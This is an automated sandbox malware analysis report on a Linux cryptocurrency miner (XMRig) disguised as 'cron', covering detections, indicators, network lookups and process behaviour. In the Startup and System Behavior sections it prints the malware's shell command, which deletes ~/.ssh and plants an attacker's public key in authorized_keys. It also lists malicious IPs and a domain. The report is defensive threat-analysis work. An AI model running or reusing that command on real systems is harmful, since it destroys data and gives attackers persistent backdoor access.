Automated Malware Analysis Report for Cron

ID: 202041 Sample Name: cron Cookbook: defaultlinuxfilecookbook.jbs Time: 02:54:41 Date: 20/01/2020 Version: 28.0.0 Lapis Lazuli Table of Contents

Table of Contents 2 Analysis Report cron 4 Overview 4 General Information 4 Detection 4 Classification 4 Mitre Att&ck Matrix 5 Signature Overview 6 AV Detection: 6 Bitcoin Miner: 6 Networking: 6 System Summary: 6 Persistence and Installation Behavior: 6 Malware Analysis System Evasion: 6 Malware Configuration 7 Runtime Messages 7 Behavior Graph 7 Yara Overview 7 Initial Sample 7 PCAP (Network Traffic) 8 Dropped Files 8 Sigma Overview 8 Joe Sandbox View / Context 8 IPs 8 Domains 8 ASN 8 JA3 Fingerprints 9 Dropped Files 9 Antivirus, Machine Learning and Genetic Malware Detection 9 Initial Sample 9 Dropped Files 9 Domains 9 URLs 9 Startup 9 Created / dropped Files 10 Domains and IPs 10 Contacted Domains 10 URLs from Memory and Binaries 10 Contacted IPs 10 Public 11 Static File Info 11 General 11 Static ELF Info 11 ELF header 11 Sections 12 Program Segments 12 Dynamic Tags 12 Symbols 13 Network Behavior 13 Network Port Distribution 13 TCP Packets 13 UDP Packets 13 DNS Queries 13 DNS Answers 14 System Behavior 14 Analysis Process: cron PID: 20755 Parent PID: 20706 14 General 14 File Activities 14 File Read 14 Copyright Joe Security LLC 2020 Page 2 of 17 Directory Enumerated 14 Analysis Process: cron PID: 20758 Parent PID: 20755 14 General 14 Analysis Process: sh PID: 20758 Parent PID: 20755 14 General 15 File Activities 15 File Read 15 File Written 15 Analysis Process: sh PID: 20760 Parent PID: 20758 15 General 15 Analysis Process: rm PID: 20760 Parent PID: 20758 15 General 15 File Activities 15 File Deleted 15 File Read 15 Analysis Process: sh PID: 20762 Parent PID: 20758 15 General 15 Analysis Process: mkdir PID: 20762 Parent PID: 20758 16 General 16 File Activities 16 File Read 16 Directory Created 16 Analysis Process: sh PID: 20768 Parent PID: 20758 16 General 16 Analysis Process: chmod PID: 20768 Parent PID: 20758 16 General 16 File Activities 16 File Read 16 Directory Enumerated 16 Permission Modified 16 Analysis Process: cron PID: 20772 Parent PID: 20755 16 General 16 File Activities 17 File Read 17 File Written 17

Overview

General Information

Joe Sandbox Version: 28.0.0 Lapis Lazuli Analysis ID: 202041 Start date: 20.01.2020 Start time: 02:54:41 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 6m 7s Hypervisor based Inspection enabled: false Report type: light Sample file name: cron Cookbook file name: defaultlinuxfilecookbook.jbs Analysis system description: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171) Detection: MAL Classification: mal76.troj.mine.lin@0/2@4/0 Warnings: Show All

Detection

Strategy Score Range Reporting Whitelisted Threat Detection

Xmrig Threshold 76 0 - 100 false

Classification

Miner Spreading

mmaallliiiccciiioouusss

malicious

Evader Phishing

sssuusssppiiiccciiioouusss

suspicious

cccllleeaann

clean

Exploiter Banker

Spyware Trojan / Bot

Adware

Mitre Att&ck Matrix

Remote Initial Privilege Defense Credential Lateral Command Network Service Access Execution Persistence Escalation Evasion Access Discovery Movement Collection Exfiltration and Control Effects Effects Valid Command-Line Hidden Files Port Hidden Files Credential Security Application Data from Data Standard Non- Eavesdrop on Remotely Accounts Interface 1 and Monitors and Dumping Software Deployment Local Compressed Application Insecure Track Device Directories 1 Directories 1 Discovery 1 Software System Layer Network Without Protocol 1 Communication Authorization Replication Scripting 1 Port Monitors Accessibility File and Network File and Remote Data from Exfiltration Standard Exploit SS7 to Remotely Through Features Directory Sniffing Directory Services Removable Over Other Application Redirect Phone Wipe Data Removable Permissions Discovery 1 Media Network Layer Calls/SMS Without Media Modification 1 Medium Protocol 1 Authorization External Windows Accessibility Path Scripting 1 Input System Windows Data from Automated Custom Exploit SS7 to Obtain Remote Management Features Interception Capture Information Remote Network Exfiltration Cryptographic Track Device Device Services Instrumentation Discovery 3 Management Shared Protocol Location Cloud Drive Backups Drive-by Scheduled System DLL Search File Credentials System Logon Input Data Multiband SIM Card Compromise Task Firmware Order Deletion 1 in Files Network Scripts Capture Encrypted Communication Swap Hijacking Configuration Discovery

• AV Detection • Bitcoin Miner • Networking • System Summary • Persistence and Installation Behavior • Malware Analysis System Evasion

Click to jump to signature section

AV Detection:

Antivirus detection for sample

Multi AV Scanner detection for submitted file

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner

Detected Stratum mining protocol

Found strings related to Crypto-Mining

Reads CPU information from /proc indicative of miner or evasive malware

Reads CPU information from /sys indicative of miner or evasive malware

Networking:

Performs DNS lookups

Urls found in memory or binary data

System Summary:

Sample contains strings that are potentially command strings

Sample has stripped symbol table

Classification label

Persistence and Installation Behavior:

Sample reads /proc/mounts (often used for finding a writable filesystem)

Counts the number of processes currently running

Creates hidden files and/or directories

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "rm" command used to delete files or directories

Reads system information from the proc file system

Sample tries to set the executable flag

Malware Analysis System Evasion:

Reads CPU information from /proc indicative of miner or evasive malware Copyright Joe Security LLC 2020 Page 6 of 17 Reads CPU information from /sys indicative of miner or evasive malware

Uses the "uname" system call to query kernel version information (possible evasion)

Malware Configuration

No configs have been found

Runtime Messages

Command: /tmp/cron Exit Code: 0 Exit Code Info: Killed: False Standard Output: [2020-01-20 03:55:23.995] unable to open '/tmp/config.json'. Standard Error:

Behavior Graph

Hide Legend Behavior Graph Legend: ID: 202041

Sample: cron Process Startdate: 20/01/2020 Signature Architecture: LINUX Score: 76 Created File DNS/IP Info Is Dropped 45.9.148.125, 45164, 80 Number of created Files unknown debian-package.center Netherlands Is malicious

started Internet

Antivirus detection Multi AV Scanner detection Yara detected Xmrig 2 other signatures for sample for submitted file cryptocurrency miner

cron

Sample reads /proc/mounts (often used for finding started started a writable filesystem)

cron cron sh

started started started

sh sh sh rm mkdir chmod

Yara Overview

Initial Sample

Source Rule Description Author Strings

Copyright Joe Security LLC 2020 Page 7 of 17 Source Rule Description Author Strings cron JoeSecurity_Xmrig Yara detected Joe Security Xmrig cryptocurrency miner

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Sigma Overview

No Sigma rule has matched

Joe Sandbox View / Context

IPs

Match Associated Sample Name / URL SHA 256 Detection Link Context 45.9.148.125 anacron Get hash malicious Browse cron Get hash malicious Browse cQLmNrun Get hash malicious Browse

Domains

Match Associated Sample Name / URL SHA 256 Detection Link Context debian-package.center anacron Get hash malicious Browse 45.9.148.117 cron Get hash malicious Browse 45.9.148.129 cron Get hash malicious Browse 45.9.148.129

ASN

Match Associated Sample Name / URL SHA 256 Detection Link Context unknown anacron Get hash malicious Browse 45.9.148.125 testfile Get hash malicious Browse 91.189.92.20 Launcher.apk Get hash malicious Browse 216.58.201.99 5.45.79.15/input/?mark=20200116- Get hash malicious Browse 185.211.246.22 wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engke y=delonghi%20portafilter%20size 5.45.79.15/input/?mark=20200116- Get hash malicious Browse 185.211.246.22 wentontravel.com/cuz&tpl=XXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX&engke y=delonghi portafilter size Project2.doc Get hash malicious Browse 51.15.6.128 https://top4top.io/downloadf-11687unj01-rar.html Get hash malicious Browse 54.38.152.27 www.ltyuye.com/wp-admin/rrktd1y-1v-75/ Get hash malicious Browse 23.235.217.105 txfc58.com/wordpress/m2utbn-3ft4c-07947/ Get hash malicious Browse 185.216.11 3.122 instructions 01 18 2020.doc Get hash malicious Browse 23.235.217.105 instructions 01 18 2020.doc Get hash malicious Browse 217.160.5.123 PO987889-JAN-20-20-Order_Quote,pdf.exe Get hash malicious Browse 172.217.23.193 koadic_test_online_9997_rundll.vbs Get hash malicious Browse 79.137.36.9 www.searchnewtabs.com/download Get hash malicious Browse 52.206.61.22 91.92.66.124/..j/ Get hash malicious Browse 91.92.66.124

Copyright Joe Security LLC 2020 Page 8 of 17 Match Associated Sample Name / URL SHA 256 Detection Link Context https://gcc01.safelinks.protection.outlook.com/? Get hash malicious Browse 209.197.3.24 url=https%3A%2F%2Fsway.office.com%2FUN0jHy70XUb7BI Xa%3Fref%3DLink&data=02%7C01%7Cjh.jackson%40trade.g ov%7Cc3e4a0c456a7407e91f408d79a641704%7Ca1d183f26c 7b4d9ab9945f2f31b3f780%7C1%7C1%7C6371476269863866 89&sdata=AhWGM0VN8KygMfO7X6%2FHVaDVvk7tiKzPkuC oZ%2FooVfs%3D&reserved=0 95.179.163.186 Get hash malicious Browse 95.179.163.186 https://perfecttux.com Get hash malicious Browse 147.75.84.39 INVOICE FAF3766_778982019.doc Get hash malicious Browse 185.216.11 3.122 INVOICE FAF3766_778982019.doc Get hash malicious Browse 217.160.5.123

JA3 Fingerprints

No context

Dropped Files

No context

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source Detection Scanner Label Link cron 41% Virustotal Browse cron 100% Avira LINUX/BitCoinMiner.cgym m

Dropped Files

No Antivirus matches

Domains

Source Detection Scanner Label Link debian-package.center 0% Virustotal Browse

URLs

Source Detection Scanner Label Link https://xmrig.com/docs/algorithms 0% Virustotal Browse https://xmrig.com/docs/algorithms 0% Avira URL Cloud safe

Startup

system is lnxubuntu1 cron (PID: 20755, Parent: 20706, MD5: 84945e9ea1950be3e870b798bd7c7559) Arguments: /tmp/cron cron New Fork (PID: 20758, Parent: 20755) sh (PID: 20758, Parent: 20755, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9Eu WOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGP K5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~" sh New Fork (PID: 20760, Parent: 20758) rm (PID: 20760, Parent: 20758, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -rf .ssh sh New Fork (PID: 20762, Parent: 20758) mkdir (PID: 20762, Parent: 20758, MD5: a97f666f21c85ec62ea47d022263ef41) Arguments: mkdir .ssh sh New Fork (PID: 20768, Parent: 20758) chmod (PID: 20768, Parent: 20758, MD5: 32c8c7318223ebc5b934a78cfc153d6f) Arguments: chmod -R go= /home/user/.ssh cron New Fork (PID: 20772, Parent: 20755) cleanup

/home/user/.ssh/authorized_keys Process: /bin/sh File Type: OpenSSH RSA public key Size (bytes): 389 Entropy (8bit): 5.91239652812259 Encrypted: false MD5: A420F7A60A40F3FF3A806A01FEB1DFDA SHA1: 1AE65132B036DE51BCC62F66B51AE362E11182AF SHA-256: A8460F446BE540410004B1A8DB4083773FA46F7FE76FA84219C93DAA1669F8F2 SHA-512: 1BA854C321D89441291DA2638D65748FFA06923A63FD2BB9BE8A66440236503FB34E375726A8DA679B55CED51DDA82293FFCFB8BB76563E2DA0071222D3247BF Malicious: false Reputation: low Preview: ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1R V/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQH md1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySV KPRK+oRw== mdrfckr.

/sys/devices/system/node/node0/hugepages/hugepages-2048kB/nr_hugepages Process: /tmp/cron File Type: ASCII text, with no line terminators Size (bytes): 6 Entropy (8bit): 1.9182958340544893 Encrypted: false MD5: 1054DD099E3998ACB4C217F5AE41D8C8 SHA1: 9F649342B81C46321145FB8F13EDD0F61487F1B4 SHA-256: 498A8E5240652961A0C8BCE6BBAB33A705253FF3B4E81403E5CFE3B779263A5A SHA-512: 03070B43582647A6344B3FFB462DFB4F77814D6ABB77E162A42486B07A13CF0AEBAEB1F2E25003C104808AB9D7ECF6E70EC686C9078F7183BA3E2823216EF4B7 Malicious: false Reputation: low Preview: 128129

Domains and IPs

Contacted Domains

Name IP Active Malicious Antivirus Detection Reputation debian-package.center 45.9.148.117 true false 0%, Virustotal, Browse unknown

URLs from Memory and Binaries

Contacted IPs

50% < No. of IPs < 75% 75% < No. of IPs

Public

IP Country Flag ASN ASN Name Malicious 45.9.148.125 Netherlands 49447 unknown true

Static File Info

General File type: ELF 64-bit LSB shared object, x86-64, version 1 (S YSV), dynamically linked, stripped Entropy (8bit): 6.344544956625536 TrID: ELF Executable and Linkable format (Linux) (4029/14) 49.77% ELF Executable and Linkable format (generic) (4004/1) 49.46% Lumena CEL bitmap (63/63) 0.78% File name: cron File size: 2401096 MD5: 84945e9ea1950be3e870b798bd7c7559 SHA1: 95b4a0e956499b8ea07cd5e880ac7dd2d88131c1 SHA256: fd9007df08c1bd2cf47fb97443c4d7360e204f4d8fe48c5d 603373b2b2975708 SHA512: 0b3c5075f9dde4d316aca1d3ba393a4e69288a1af5c05d1 b3e309ddefcd653f3e3a5a8dd859a846ad2a5a34b381b34 f9809a6e85ded408ec4b1b9c7964ebaabd SSDEEP: 49152:10cWKu0K8CpxlJWhabW/////////In6C1NdvKODy YGhiDC61N04EXBJDJw5qjURX:+d08xrbW/////////viu6T0 lXBJDJwE2 File Content Preview: .ELF...... >...... @...... $...... @.8...@...... V...... V...... `...... `...... `...... 8...... 8...... @.#. ....@.$....

Static ELF Info

ELF header Class: ELF64 Data: 2's complement, little endian Version: 1 (current)

Copyright Joe Security LLC 2020 Page 11 of 17 ELF header Machine: Advanced Micro Devices X86-64 Version Number: 0x1 Type: DYN (Shared object file) OS/ABI: UNIX - System V ABI Version: 0 Entry Point Address: 0x195e7 Flags: 0x0 ELF Header Size: 64 Program Header Offset: 64 Program Header Size: 56 Number of Program Headers: 9 Section Header Offset: 2399496 Section Header Size: 64 Number of Section Headers: 25 Header String Table Index: 24

Sections

Flags Name Type Address Offset Size EntSize Flags Description Link Info Align NULL 0x0 0x0 0x0 0x0 0x0 0 0 0 .gnu.hash GNU_HASH 0x238 0x238 0x1c 0x0 0x2 A 2 0 8 .dynsym DYNSYM 0x258 0x258 0x18 0x18 0x2 A 3 1 8 .dynstr STRTAB 0x270 0x270 0x1 0x0 0x2 A 0 0 1 .rela.dyn RELA 0x278 0x278 0x15480 0x18 0x2 A 2 0 8 .init PROGBITS 0x16000 0x16000 0xd 0x0 0x6 AX 0 0 1 .plt PROGBITS 0x16010 0x16010 0x90 0x10 0x6 AX 0 0 16 .text PROGBITS 0x160c0 0x160c0 0x1bba70 0x0 0x6 AX 0 0 64 .fini PROGBITS 0x1d1b30 0x1d1b30 0x8 0x0 0x6 AX 0 0 1 .rodata PROGBITS 0x1d2000 0x1d2000 0x1cef0 0x0 0x2 A 0 0 32 .eh_frame_hdr PROGBITS 0x1eeef0 0x1eeef0 0xc18c 0x0 0x2 A 0 0 4 .eh_frame PROGBITS 0x1fb080 0x1fb080 0x3eb90 0x0 0x2 A 0 0 8 .gcc_except_table PROGBITS 0x239c10 0x239c10 0x5d08 0x0 0x2 A 0 0 4 .tbss NOBITS 0x240c40 0x23fc40 0x20 0x0 0x403 WAT 0 0 8 .init_array INIT_ARRAY 0x240c40 0x23fc40 0x108 0x8 0x3 WA 0 0 8 .fini_array FINI_ARRAY 0x240d48 0x23fd48 0x18 0x8 0x3 WA 0 0 8 .ctors PROGBITS 0x240d60 0x23fd60 0x10 0x0 0x3 WA 0 0 8 .dtors PROGBITS 0x240d70 0x23fd70 0x10 0x0 0x3 WA 0 0 8 .data.rel.ro PROGBITS 0x240d80 0x23fd80 0x8ed0 0x0 0x3 WA 0 0 32 .dynamic DYNAMIC 0x249c50 0x248c50 0x190 0x10 0x3 WA 3 0 8 .got PROGBITS 0x249de0 0x248de0 0x208 0x8 0x3 WA 0 0 8 .data PROGBITS 0x24a000 0x249000 0xc18 0x0 0x3 WA 0 0 32 .bss NOBITS 0x24ac40 0x249c18 0xdaa8 0x0 0x3 WA 0 0 64 .comment PROGBITS 0x0 0x249c18 0x1a 0x1 0x30 MS 0 0 1 .shstrtab STRTAB 0x0 0x249c32 0xd3 0x0 0x0 0 0 1

Program Segments

Physical Flags Type Offset Virtual Address Address File Size Memory Size Flags Description Align Prog Interpreter Section Mappings LOAD 0x0 0x0 0x0 0x156f8 0x156f8 0x4 R 0x1000 .gnu.hash .dynsym .dynstr .rela.dyn LOAD 0x16000 0x16000 0x16000 0x1bbb38 0x1bbb38 0x5 R E 0x1000 .init .plt .text .fini LOAD 0x1d2000 0x1d2000 0x1d2000 0x6d918 0x6d918 0x4 R 0x1000 .rodata .eh_frame_hdr .eh_frame .gcc_except_table LOAD 0x23fc40 0x240c40 0x240c40 0x9fd8 0x17aa8 0x6 RW 0x1000 .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got .data .bss DYNAMIC 0x248c50 0x249c50 0x249c50 0x190 0x190 0x6 RW 0x8 .dynamic TLS 0x23fc40 0x240c40 0x240c40 0x0 0x20 0x4 R 0x8 GNU_EH_FRAME 0x1eeef0 0x1eeef0 0x1eeef0 0xc18c 0xc18c 0x4 R 0x4 .eh_frame_hdr GNU_STACK 0x0 0x0 0x0 0x0 0x0 0x6 RW 0x10 GNU_RELRO 0x23fc40 0x240c40 0x240c40 0x93c0 0x93c0 0x4 R 0x1 .init_array .fini_array .ctors .dtors .data.rel.ro .dynamic .got

Dynamic Tags

Copyright Joe Security LLC 2020 Page 12 of 17 Type Meta Value Tag DT_SYMBOLIC value 0x0 0x10 DT_INIT value 0x16000 0xc DT_FINI value 0x1d1b30 0xd DT_INIT_ARRAY value 0x240c40 0x19 DT_INIT_ARRAYSZ bytes 264 0x1b DT_FINI_ARRAY value 0x240d48 0x1a DT_FINI_ARRAYSZ bytes 24 0x1c DT_GNU_HASH value 0x238 0x6ffffef5 DT_STRTAB value 0x270 0x5 DT_SYMTAB value 0x258 0x6 DT_STRSZ bytes 1 0xa DT_SYMENT bytes 24 0xb DT_DEBUG value 0x0 0x15 DT_PLTGOT value 0x249de0 0x3 DT_RELA value 0x278 0x7 DT_RELASZ bytes 87168 0x8 DT_RELAENT bytes 24 0x9 DT_BIND_NOW value 0x0 0x18 DT_FLAGS_1 value 0x8000001 0x6ffffffb DT_RELACOUNT value 3632 0x6ffffff9 DT_NULL value 0x0 0x0

Symbols

Version Info Version Info File Symbol Name Name Name Section Name Value Size Symbol Type Symbol Bind Visibility Ndx .dynsym 0x0 0 NOTYPE DEFAULT SHN_UNDEF

Network Behavior

Network Port Distribution

Total Packets: 21 • 53 (DNS) • 80 (HTTP)

TCP Packets

UDP Packets

DNS Queries

Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jan 20, 2020 02:55:24.767127991 CET 192.168.2.20 8.8.8.8 0xe437 Standard query debian-pac A (IP address) IN (0x0001) (0) kage.center Jan 20, 2020 02:55:24.771472931 CET 192.168.2.20 8.8.4.4 0xe437 Standard query debian-pac A (IP address) IN (0x0001) (0) kage.center Jan 20, 2020 02:55:24.771579027 CET 192.168.2.20 8.8.8.8 0xe558 Standard query debian-pac 28 IN (0x0001) (0) kage.center

Copyright Joe Security LLC 2020 Page 13 of 17 Timestamp Source IP Dest IP Trans ID OP Code Name Type Class Jan 20, 2020 02:55:24.771637917 CET 192.168.2.20 8.8.4.4 0xe558 Standard query debian-pac 28 IN (0x0001) (0) kage.center

DNS Answers

Timestamp Source IP Dest IP Trans ID Reply Code Name CName Address Type Class Jan 20, 2020 8.8.8.8 192.168.2.20 0xe437 No error (0) debian-pac 45.9.148.117 A (IP address) IN (0x0001) 02:55:24.792550087 kage.center CET Jan 20, 2020 8.8.8.8 192.168.2.20 0xe437 No error (0) debian-pac 45.9.148.129 A (IP address) IN (0x0001) 02:55:24.792550087 kage.center CET Jan 20, 2020 8.8.8.8 192.168.2.20 0xe437 No error (0) debian-pac 45.9.148.125 A (IP address) IN (0x0001) 02:55:24.792550087 kage.center CET Jan 20, 2020 8.8.4.4 192.168.2.20 0xe437 No error (0) debian-pac 45.9.148.117 A (IP address) IN (0x0001) 02:55:24.796895027 kage.center CET Jan 20, 2020 8.8.4.4 192.168.2.20 0xe437 No error (0) debian-pac 45.9.148.129 A (IP address) IN (0x0001) 02:55:24.796895027 kage.center CET Jan 20, 2020 8.8.4.4 192.168.2.20 0xe437 No error (0) debian-pac 45.9.148.125 A (IP address) IN (0x0001) 02:55:24.796895027 kage.center CET

System Behavior

Analysis Process: cron PID: 20755 Parent PID: 20706

General

Start time: 02:55:23 Start date: 20/01/2020 Path: /tmp/cron Arguments: /tmp/cron File size: 2401096 bytes MD5 hash: 84945e9ea1950be3e870b798bd7c7559

File Activities

File Read

Directory Enumerated

Analysis Process: cron PID: 20758 Parent PID: 20755

General

Start time: 02:55:23 Start date: 20/01/2020 Path: /tmp/cron Arguments: n/a File size: 2401096 bytes MD5 hash: 84945e9ea1950be3e870b798bd7c7559

Analysis Process: sh PID: 20758 Parent PID: 20755

Start time: 02:55:23 Start date: 20/01/2020 Path: /bin/sh Arguments: sh -c "cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9 p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1 kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGm d4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~" File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

File Activities

File Read

File Written

Analysis Process: sh PID: 20760 Parent PID: 20758

General

Start time: 02:55:23 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: rm PID: 20760 Parent PID: 20758

General

Start time: 02:55:23 Start date: 20/01/2020 Path: /bin/rm Arguments: rm -rf .ssh File size: 60272 bytes MD5 hash: b79876063d894c449856cca508ecca7f

File Activities

File Deleted

File Read

Analysis Process: sh PID: 20762 Parent PID: 20758

General

Start time: 02:55:23 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

General

Start time: 02:55:23 Start date: 20/01/2020 Path: /bin/mkdir Arguments: mkdir .ssh File size: 76848 bytes MD5 hash: a97f666f21c85ec62ea47d022263ef41

File Activities

File Read

Directory Created

Analysis Process: sh PID: 20768 Parent PID: 20758

General

Start time: 02:55:23 Start date: 20/01/2020 Path: /bin/sh Arguments: n/a File size: 4 bytes MD5 hash: e02ea3c3450d44126c46d658fa9e654c

Analysis Process: chmod PID: 20768 Parent PID: 20758

General

Start time: 02:55:23 Start date: 20/01/2020 Path: /bin/chmod Arguments: chmod -R go= /home/user/.ssh File size: 56112 bytes MD5 hash: 32c8c7318223ebc5b934a78cfc153d6f

File Activities

File Read

Directory Enumerated

Permission Modified

Analysis Process: cron PID: 20772 Parent PID: 20755

General

Start time: 02:55:23 Start date: 20/01/2020 Path: /tmp/cron Copyright Joe Security LLC 2020 Page 16 of 17 Arguments: n/a File size: 2401096 bytes MD5 hash: 84945e9ea1950be3e870b798bd7c7559

File Activities

File Read

File Written